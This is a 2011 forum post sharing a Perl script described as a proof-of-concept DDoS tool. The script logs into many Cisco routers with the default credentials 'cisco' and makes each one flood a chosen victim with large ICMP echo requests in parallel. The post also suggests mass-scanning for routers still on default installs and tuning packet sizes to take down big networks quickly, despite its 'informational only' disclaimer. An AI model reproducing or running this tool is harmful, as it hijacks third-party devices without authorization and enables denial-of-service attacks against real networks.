Roy Sukro VIP Member
Jumlah posting : 392 Points : 711 Reputation : 17 Join date : 06.02.11 Age : 35 Lokasi : dimana-mana ada ^^
| Subyek: DDOS flooding on ICMP echo request Sat Dec 03, 2011 12:44 pm | |
| Prof of concept of a simple DDOS program based on ICMP echo request from cisco routers. With mass scanner you can get an important list of cisco default install and by looking to their MTU and throughtput, you may tune the ICMP size to DOS a big network in few seconds the program is informational only, please keep it on this way - Quote :
- #!/usr/bin/perl
use Parallel::ForkManager; use Net::Telnet(); use Net::Telnet::Cisco; use strict; sub usage { print “\n\n\e[00;34mddsco.pl [victim] [cisco file list] \e[00m \n\n"; exit; } my $victim = $ARGV[0]; my $file = $ARGV[1]; if ((!$victim) or (!$file)) { usage; } my $login = “cisco”; my $passwd = “cisco”; my $enable = “cisco”; my $mtu = 1500; my $cmd = “ping “.$victim.” size 1500 df-bit repeat 1000″; open FILE, “<$file” or die $!; my $pm = new Parallel::ForkManager(100); for (1..1000) { while () { $pm->start and next; my $host = $_; my $session = Net::Telnet::Cisco->new(Host => $host); $session->login($login, $passwd); $session->enable($enable); $session->cmd($cmd); $pm->finish; ## end point of the parallel process } } $pm->wait_all_children; ## wait for the child processes
| |
|